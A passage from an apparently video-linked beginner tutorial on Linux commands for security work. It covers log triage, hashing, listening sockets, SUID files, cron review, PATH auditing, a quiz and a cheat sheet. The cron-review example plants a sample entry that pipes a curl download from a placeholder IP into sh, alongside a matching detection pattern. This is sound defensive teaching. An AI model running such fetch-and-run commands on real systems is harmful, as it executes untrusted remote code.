/var/log/kern.log        # Kernel messages
/var/log/apache2/        # Web server access and error logs (if Apache is running)
/var/log/ufw.log         # Firewall logs (if UFW is enabled)

Commands you will use constantly:

tail -f /var/log/auth.log                          # Watch logins in real time
grep "Failed password" /var/log/auth.log           # Find failed login attempts
grep "Accepted password" /var/log/auth.log         # Find successful logins
grep "sudo" /var/log/auth.log                      # Find sudo usage
grep "Invalid user" /var/log/auth.log | awk '{print $8}' | sort | uniq -c | sort -rn
# Count login attempts per username that does not exist on the system
# ($8 is the username in the traditional syslog line layout; if your log uses
# ISO timestamps the field number shifts, so check one sample line first)
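Putting those greps together, here is an added example (not from the original guide) that runs the same triage over a small constructed auth.log excerpt: failed logins per source IP, attempted non-existent usernames, and the sources that cross a failure threshold. The log lines, hostname and addresses are made up (RFC 5737 documentation ranges), and the function names failed_by_ip, invalid_users and brute_force_candidates are my own.

```sh
#!/bin/sh
# Added example: triage SSH authentication events from an auth.log-style file.
# Each function takes the log file path as $1 (constructed sample below).

# Count "Failed password" events per source IP, highest first.
failed_by_ip() {
    grep 'Failed password' "$1" \
        | grep -oE 'from [0-9.]+' \
        | awk '{print $2}' \
        | sort | uniq -c | sort -rn
}

# Count "Invalid user" events per attempted username. Anchoring on the phrase
# itself avoids depending on a field position, which shifts when the
# timestamp format changes.
invalid_users() {
    grep 'Invalid user' "$1" \
        | grep -oE 'Invalid user [^ ]+' \
        | awk '{print $3}' \
        | sort | uniq -c | sort -rn
}

# Print source IPs whose failed-login count is at or above a threshold ($2).
brute_force_candidates() {
    failed_by_ip "$1" | awk -v limit="$2" '$1 >= limit {print $2}'
}

# Constructed sample log: fake host "lab", documentation-range addresses.
SAMPLE_LOG=$(mktemp)
cat > "$SAMPLE_LOG" <<'EOF'
Jan 12 10:00:01 lab sshd[1201]: Invalid user admin from 203.0.113.7 port 50011 ssh2
Jan 12 10:00:01 lab sshd[1201]: Failed password for invalid user admin from 203.0.113.7 port 50011 ssh2
Jan 12 10:00:03 lab sshd[1203]: Invalid user test from 203.0.113.7 port 50012 ssh2
Jan 12 10:00:03 lab sshd[1203]: Failed password for invalid user test from 203.0.113.7 port 50012 ssh2
Jan 12 10:00:05 lab sshd[1205]: Invalid user admin from 203.0.113.7 port 50013 ssh2
Jan 12 10:00:05 lab sshd[1205]: Failed password for invalid user admin from 203.0.113.7 port 50013 ssh2
Jan 12 10:02:10 lab sshd[1210]: Failed password for analyst from 198.51.100.4 port 40001 ssh2
Jan 12 10:02:20 lab sshd[1211]: Accepted password for analyst from 198.51.100.4 port 40002 ssh2
Jan 12 10:05:00 lab sudo:  analyst : TTY=pts/0 ; PWD=/home/analyst ; USER=root ; COMMAND=/usr/bin/apt update
EOF

echo "Failed logins per source IP:"
failed_by_ip "$SAMPLE_LOG"
echo "Attempted invalid usernames:"
invalid_users "$SAMPLE_LOG"
echo "Sources with 3 or more failures:"
brute_force_candidates "$SAMPLE_LOG" 3
```

Point the functions at /var/log/auth.log instead of the sample file to run this on your own VM. One analyst's failed attempt followed by a success is normal; many failures from one address against usernames that do not exist is the pattern worth escalating.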

awk — Extract Specific Columns from Output

ps aux | awk '{print $1, $2, $11}'      # Print user, PID, and command only
cat /etc/passwd | awk -F: '{print $1}'  # Print only usernames from /etc/passwd

awk lets you extract specific fields from structured output. The -F: sets the delimiter (colon in this case).

sed — Find and Replace in Text

sed 's/old_text/new_text/g' file.txt              # Replace all occurrences
sed -i 's/old_text/new_text/g' file.txt           # Edit the file in place
grep "error" app.log | sed 's/error/ERROR/g'      # Pipe grep output through sed

Pipes and Redirection: Combining Commands

The pipe | takes the output of one command and feeds it as input to the next. This is how you build powerful one-liners.

ps aux | grep nginx                               # Filter process list for nginx
cat /etc/passwd | grep -v "nologin" | awk -F: '{print $1}'
# List users who have a real shell (not service accounts)

ls -la | sort -k5 -n                             # List files sorted by size
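The grep -v "nologin" one-liner above is a substring match on the whole line, so it also drops any account whose name or home directory happens to contain "nologin", and it misses shells such as /bin/false. As an added example (not from the original guide), here is the same task done on the shell field itself with awk -F:, over a constructed passwd file; the function names and the sample accounts, including the deliberately odd svc-report entry with UID 0, are mine.

```sh
#!/bin/sh
# Added example: find accounts that can log in interactively by testing the
# shell field ($7) of passwd-format input, not by grepping the whole line.
# Each function takes the passwd-format file as $1 (constructed sample below).

# Usernames whose shell is not one of the common non-login shells.
interactive_accounts() {
    awk -F: '$7 !~ /(nologin|false|sync|halt|shutdown)$/ {print $1}' "$1"
}

# Same filter, but with UID and shell shown so anomalies stand out.
interactive_accounts_detail() {
    awk -F: '$7 !~ /(nologin|false)$/ {printf "%-12s uid=%-6s shell=%s\n", $1, $3, $7}' "$1"
}

# Any account with UID 0 is root, whatever it is called.
uid_zero_accounts() {
    awk -F: '$3 == 0 {print $1}' "$1"
}

# Constructed sample. "nologinfan" has a real shell but would be dropped by
# grep -v "nologin"; "svc-report" is a made-up example of a second UID 0 account.
SAMPLE_PASSWD=$(mktemp)
cat > "$SAMPLE_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
nologinfan:x:1002:1002::/home/nologinfan:/bin/bash
analyst:x:1000:1000:Lab Analyst:/home/analyst:/bin/zsh
backup:x:34:34:backup:/var/backups:/bin/false
svc-report:x:0:0::/opt/report:/bin/sh
EOF

echo "Interactive accounts:"
interactive_accounts "$SAMPLE_PASSWD"
echo "With UID and shell:"
interactive_accounts_detail "$SAMPLE_PASSWD"
echo "Accounts with UID 0:"
uid_zero_accounts "$SAMPLE_PASSWD"
```

Replace the sample path with /etc/passwd to run it for real. Comparing against /etc/shells is another option, but the field-based awk test already avoids the substring trap.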

Redirection sends output to a file instead of the terminal:

ps aux > running_processes.txt                   # Save output to a file (overwrite)
echo "scan started" >> scan_log.txt              # Append a line to a file
nmap 192.168.1.0/24 2>&1 | tee nmap_output.txt  # Save AND display output at the same time

Hashing Files

File hashing is used in malware analysis, digital forensics, and integrity verification:

md5sum suspicious_file.exe
sha256sum malware_sample.bin
sha1sum document.pdf

When you download a tool, compare the hash published on the official website against the hash of the file you downloaded. If they do not match, the file was modified in transit or corrupted, and you should not run it. Prefer SHA-256 for this check: MD5 and SHA-1 are still used to label samples, but they are no longer collision-resistant, so a matching MD5 or SHA-1 proves less.
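This check is exactly what you want before the sudo dpkg -i step from the Section 9 tip on third-party .deb files. As an added example (not from the original guide), the script below wraps sha256sum in a function that compares against a published value and only proceeds to dpkg -i on a match. The sample file and its hash are constructed (the SHA-256 of the five bytes "hello"); verify_sha256 and install_deb_verified are names I chose.

```sh
#!/bin/sh
# Added example: verify a download's SHA-256 before installing it.
# verify_sha256 FILE EXPECTED returns 0 on match and 1 on mismatch.

verify_sha256() {
    actual=$(sha256sum "$1" | awk '{print $1}')
    # Lower-case the published value so a hash copied in upper-case still compares.
    expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    if [ "$actual" = "$expected" ]; then
        echo "OK   $1"
        return 0
    fi
    echo "FAIL $1: expected $expected, got $actual" >&2
    return 1
}

# The .deb case: install only after the hash checks out. Not run in this
# example; shown for how the two steps chain with &&.
install_deb_verified() {
    verify_sha256 "$1" "$2" && sudo dpkg -i "$1"
}

# Constructed sample: a file with known contents and its real SHA-256.
SAMPLE_FILE=$(mktemp)
printf 'hello' > "$SAMPLE_FILE"
GOOD_HASH=2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e73043362938b9824
BAD_HASH=0000000000000000000000000000000000000000000000000000000000000000

verify_sha256 "$SAMPLE_FILE" "$GOOD_HASH"
verify_sha256 "$SAMPLE_FILE" "$BAD_HASH" || echo "Refusing to install: hash does not match the published value."
```

Get the expected value from the vendor's page or signed checksum file, never from the same place you got the binary if you can help it, and paste it as the second argument.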

Checking Open Connections (Threat Hunting)

ss -tulnp                                        # All listening ports with process names
ss -tp                                           # All established TCP connections
netstat -anp | grep ESTABLISHED                  # Established connections (if net-tools installed)
lsof -i :80                                      # What process is using port 80
lsof -i -n -P                                    # All open network connections with IPs

In threat hunting, you compare the baseline of what should be listening on a system against what you actually see. Anything unexpected is a lead.
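Here is that baseline comparison in code, as an added example that is not part of the original guide. It reduces ss -tulnp output to a stable "protocol port process" form (dropping the PID, which changes on every restart) and uses comm to print what is listening now that was not in the baseline. The two captures are constructed ss-style text, not live output; listeners_from_ss and new_listeners are my names. The same save-then-diff approach works for the SUID list from the next section.

```sh
#!/bin/sh
# Added example: diff the current listening sockets against a saved baseline.
# Inputs are files containing ss -tulnp output (constructed samples below).

# Normalise one capture. Data fields: $1 Netid, $5 Local Address:Port, and
# $NF is the users:(("name",pid=N,fd=M)) block when ss was run with -p.
listeners_from_ss() {
    awk 'NR > 1 {
        port = $5; sub(/.*:/, "", port)
        proc = $NF
        if (match(proc, /\("[^"]*"/)) proc = substr(proc, RSTART + 2, RLENGTH - 3)
        else proc = "-"
        print $1, port, proc
    }' "$1" | sort -u
}

# Print entries present in CURRENT ($2) but not in BASELINE ($1).
new_listeners() {
    base_norm=$(mktemp); cur_norm=$(mktemp)
    listeners_from_ss "$1" > "$base_norm"
    listeners_from_ss "$2" > "$cur_norm"
    comm -13 "$base_norm" "$cur_norm"   # lines only in the second file
    rm -f "$base_norm" "$cur_norm"
}

BASELINE=$(mktemp); CURRENT=$(mktemp)
# Constructed baseline taken on a known-good day.
cat > "$BASELINE" <<'EOF'
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp   UNCONN 0      0      0.0.0.0:68         0.0.0.0:*         users:(("dhclient",pid=611,fd=6))
tcp   LISTEN 0      128    0.0.0.0:22         0.0.0.0:*         users:(("sshd",pid=702,fd=3))
tcp   LISTEN 0      511    127.0.0.1:631      0.0.0.0:*         users:(("cupsd",pid=650,fd=7))
tcp   LISTEN 0      128    [::]:22            [::]:*            users:(("sshd",pid=702,fd=4))
EOF
# Constructed current state: same host after a reboot (new PIDs) plus one
# listener that was never in the baseline.
cat > "$CURRENT" <<'EOF'
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp   UNCONN 0      0      0.0.0.0:68         0.0.0.0:*         users:(("dhclient",pid=598,fd=6))
tcp   LISTEN 0      128    0.0.0.0:22         0.0.0.0:*         users:(("sshd",pid=690,fd=3))
tcp   LISTEN 0      511    127.0.0.1:631      0.0.0.0:*         users:(("cupsd",pid=640,fd=7))
tcp   LISTEN 0      128    [::]:22            [::]:*            users:(("sshd",pid=690,fd=4))
tcp   LISTEN 0      5      0.0.0.0:8000       0.0.0.0:*         users:(("python3",pid=3120,fd=3))
EOF

echo "New listeners since baseline:"
new_listeners "$BASELINE" "$CURRENT"
```

On a real host, save sudo ss -tulnp > baseline.txt while the system is known good, then run the diff against a fresh capture during an investigation. Run ss as root, or the Process column is empty for other users' sockets and every process shows as "-".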

Checking SUID/SGID Files (Privilege Escalation)

find / -perm /4000 2>/dev/null                   # Find all SUID files
find / -perm /2000 2>/dev/null                   # Find all SGID files
find / -perm /6000 2>/dev/null                   # Find both

SUID (Set User ID) files run with the permissions of the file owner rather than the user who launched them. If a SUID file owned by root contains a vulnerability, it can be exploited to gain root access. This is a standard check in penetration testing.

Cron Jobs — Scheduled Tasks

crontab -l                                       # List your current cron jobs
sudo crontab -l                                  # List root's cron jobs
cat /etc/crontab                                 # System-wide cron jobs
ls /etc/cron.d/                                  # Additional cron job files
ls /etc/cron.daily/ /etc/cron.weekly/            # Scheduled system maintenance tasks

Attackers frequently use cron jobs for persistence, scheduling a backdoor to run every minute. Reviewing scheduled tasks is a standard part of incident response.
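To make that review repeatable, here is an added example (not from the original guide) that reads entries in /etc/crontab layout and flags the three things a responder checks first: every-minute schedules, commands living in temporary or world-writable directories, and downloads piped straight into a shell. It assumes the six-field system layout with a user column, so it applies to /etc/crontab and /etc/cron.d/* and not to per-user crontab -l output. The sample crontab is constructed and suspicious_cron is my name.

```sh
#!/bin/sh
# Added example: flag crontab entries worth a second look.
# Input ($1) is a file in /etc/crontab layout: min hour dom month dow user command.

suspicious_cron() {
    awk '
        # Skip blank lines, comments and assignments such as SHELL=/bin/sh
        /^[ \t]*#/ || /^[ \t]*$/ || /^[A-Za-z_]+=/ { next }
        {
            cmd = $7
            for (i = 8; i <= NF; i++) cmd = cmd " " $i
            reasons = ""
            # Legitimate jobs rarely need to run every minute
            if ($1 == "*" && $2 == "*" && $3 == "*" && $4 == "*" && $5 == "*")
                reasons = "every-minute"
            # Command lives in a temporary or world-writable directory
            if (cmd ~ /\/(tmp|var\/tmp|dev\/shm)\//)
                reasons = reasons (reasons == "" ? "" : ",") "temp-dir"
            # Download piped directly into a shell interpreter
            if (cmd ~ /(curl|wget)[^|]*\|[ \t]*(ba)?sh/)
                reasons = reasons (reasons == "" ? "" : ",") "pipe-to-shell"
            if (reasons != "") printf "[%s] user=%s cmd=%s\n", reasons, $6, cmd
        }' "$1"
}

# Constructed sample in /etc/crontab layout: three ordinary entries and two
# made-up entries of the kind this review is meant to surface.
SAMPLE_CRONTAB=$(mktemp)
cat > "$SAMPLE_CRONTAB" <<'EOF'
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
0 3     * * 0   analyst /home/analyst/bin/weekly-report.sh
* *     * * *   www-data /tmp/.cache/update.sh
*/5 *   * * *   root    curl -s http://203.0.113.9/setup.sh | sh
EOF

echo "Entries to review:"
suspicious_cron "$SAMPLE_CRONTAB"
```

Run it as suspicious_cron /etc/crontab and then over each file in /etc/cron.d/. A hit is a lead, not a verdict: confirm what the referenced script actually does before acting.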

Environment Variables

env                                              # Print all environment variables
echo $PATH                                       # Show where Linux looks for commands
echo $HOME                                       # Show your home directory
export MY_VAR="hello"                            # Set a temporary variable

The $PATH variable is particularly relevant in security. It defines where the system looks for executables. PATH hijacking is a privilege escalation technique where an attacker places a malicious file with the same name as a legitimate command in a directory that is searched before the real one.
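From the defender's side, the question is whether your own PATH has an entry an attacker could write to. The following added example (not from the original guide) audits a PATH string for exactly that: empty or relative elements (which make the shell search the current directory), directories writable by everyone, and entries that do not exist. It builds its sample from two temporary directories with known modes; path_findings is my name for the function.

```sh
#!/bin/sh
# Added example: report PATH entries that make command hijacking possible.
# path_findings PATH_STRING prints one finding per line, nothing when clean.

path_findings() {
    printf '%s\n' "$1" | tr ':' '\n' | while IFS= read -r dir; do
        case "$dir" in
            "")
                # An empty element means "search the current directory".
                echo "EMPTY-ENTRY (current directory is searched)" ;;
            /*)
                if [ ! -d "$dir" ]; then
                    echo "MISSING $dir"
                # The 9th character of ls -ld output is the write bit for "others".
                elif [ "$(ls -ld "$dir" | cut -c9)" = "w" ]; then
                    echo "WORLD-WRITABLE $dir"
                fi ;;
            *)
                echo "RELATIVE $dir" ;;
        esac
    done
}

# Constructed sample: one safe directory, one world-writable directory, an
# empty element, a relative element and a path that does not exist.
SAFE_DIR=$(mktemp -d); chmod 755 "$SAFE_DIR"
WW_DIR=$(mktemp -d);   chmod 777 "$WW_DIR"
SAMPLE_PATH="$SAFE_DIR:$WW_DIR::relative/bin:/nonexistent/lab/dir"

echo "Findings for the constructed PATH:"
path_findings "$SAMPLE_PATH"
echo "Findings for this shell's real PATH:"
path_findings "$PATH"
```

A clean PATH lists only absolute directories that exist and are writable by root alone. Check the PATH of service accounts and of root's cron environment too, not just your interactive shell.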


Section 10 Practice Quiz

Question 1: You are investigating a potential compromise on a Linux server. Write a command to find all failed SSH login attempts in /var/log/auth.log.

Question 2: You want to find every SUID file on the system. What command do you use, and why are SUID files significant in security?

Question 3: You have run nmap 192.168.1.0/24 and want to save the output to a file called scan.txt while also seeing it on screen. What command do you use?

Question 4: You want to list all users on the system who have a real shell (i.e., are not service accounts with /usr/sbin/nologin). Write a command using pipes.

Answers: 1) grep "Failed password" /var/log/auth.log 2) find / -perm /4000 2>/dev/null. SUID files run as their owner rather than the user who launched them, which can be exploited for privilege escalation if misconfigured 3) nmap 192.168.1.0/24 | tee scan.txt 4) cat /etc/passwd | grep -v "nologin" or more precisely cat /etc/passwd | grep -v "nologin" | grep -v "false" | awk -F: '{print $1}'


Quick Reference Cheat Sheet {#cheat-sheet}

Navigation

Command                              What It Does
pwd                                  Show current directory
ls -la                               List all files including hidden, long format
cd /path                             Navigate to an absolute path
cd ~                                 Go to home directory
cd ..                                Go up one level
tree -L 2                            Show folder structure, 2 levels deep

Files and Folders

Command                              What It Does
touch file.txt                       Create an empty file
mkdir -p a/b/c                       Create nested folders
cp -r src/ dst/                      Copy folder recursively
mv file.txt new.txt                  Rename or move a file
rm -r folder/                        Delete a folder and contents
find / -name "file"                  Find a file by name

Viewing Files

Command                              What It Does
cat file.txt                         Print file to terminal
less file.txt                        Scroll through a file
head -20 file.txt                    First 20 lines
tail -f /var/log/syslog              Follow a live log
grep "term" file.txt                 Search inside a file
wc -l file.txt                       Count lines in a file

Permissions

Command                              What It Does
chmod 755 script.sh                  Standard executable permissions
chmod 600 key.pem                    Private file, owner only
chown user:group file                Change owner and group
sudo command                         Run as root

Users

Command                              What It Does
whoami                               Current username
id                                   Full UID, GID, groups
sudo useradd -m -s /bin/bash user    Create a user
sudo passwd user                     Set a password
sudo usermod -aG sudo user           Add to sudo group
sudo userdel -r user                 Delete user and home folder

Processes

Command                              What It Does
ps aux                               All running processes
top or htop                          Live process monitor
kill -9 PID                          Force kill a process
command &                            Run in background

Networking

Command                              What It Does
ip a                                 Show IP addresses
ping -c 4 host                       Test connectivity
ss -tulnp                            Listening ports with processes
dig domain.com                       DNS lookup
curl -I https://site.com             HTTP headers

Packages

Command                              What It Does
sudo apt update                      Refresh package list
sudo apt install pkg                 Install a package
sudo apt purge pkg                   Remove + delete config
dpkg -l                              List installed packages

What’s Next in the Series

In Part 3, you will set up a full SOC environment. This means:

  • Installing Ubuntu Server as a second virtual machine
  • Deploying Splunk on Ubuntu to act as your SIEM
  • Generating log data from your Kali machine
  • Writing your first detection rules and alerts
  • Running a simulated attack and detecting it in Splunk

That is where everything in this guide starts to connect. The users you create, the processes you understand, and the logs you now know how to read will all feed into your SIEM and show up as events for you to investigate.

If you want to be notified when Part 3 drops, subscribe to the channel and hit the bell.


Video Timestamps {#timestamps}

Jump to any section in the video:

  • 0:00 — Introduction: Why Linux Matters in Cybersecurity
  • 0:45 — Opening the Kali Linux Terminal
  • 1:10 — Section 1: The man Command and Getting Help
  • 3:20 — Section 2: Navigation — pwd, ls, cd, tree
  • 8:15 — Section 3: Working With Files — touch, mkdir, cp, mv, rm
  • 15:40 — Section 4: Reading File Content — cat, less, head, tail, grep
  • 23:00 — Section 5: File Permissions Explained — chmod, chown, sudo
  • 31:30 — Section 6: Users and Groups — Creating, Modifying, Deleting Users
  • 40:00 — Section 7: Processes — ps, top, kill
  • 46:15 — Section 8: Networking Commands — ip a, ping, ss, dig, curl
  • 54:20 — Section 9: Package Management — apt install, update, remove
  • 59:00 — Section 10: Cybersecurity-Specific Commands — Logs, Hashing, SUID, Cron
  • 1:10:00 — Final Quiz Walkthrough and Recap

If this guide helped you, share it with someone who is trying to break into cybersecurity. And if you want to support more free content like this:

Support the Channel (Buy Me a Coffee)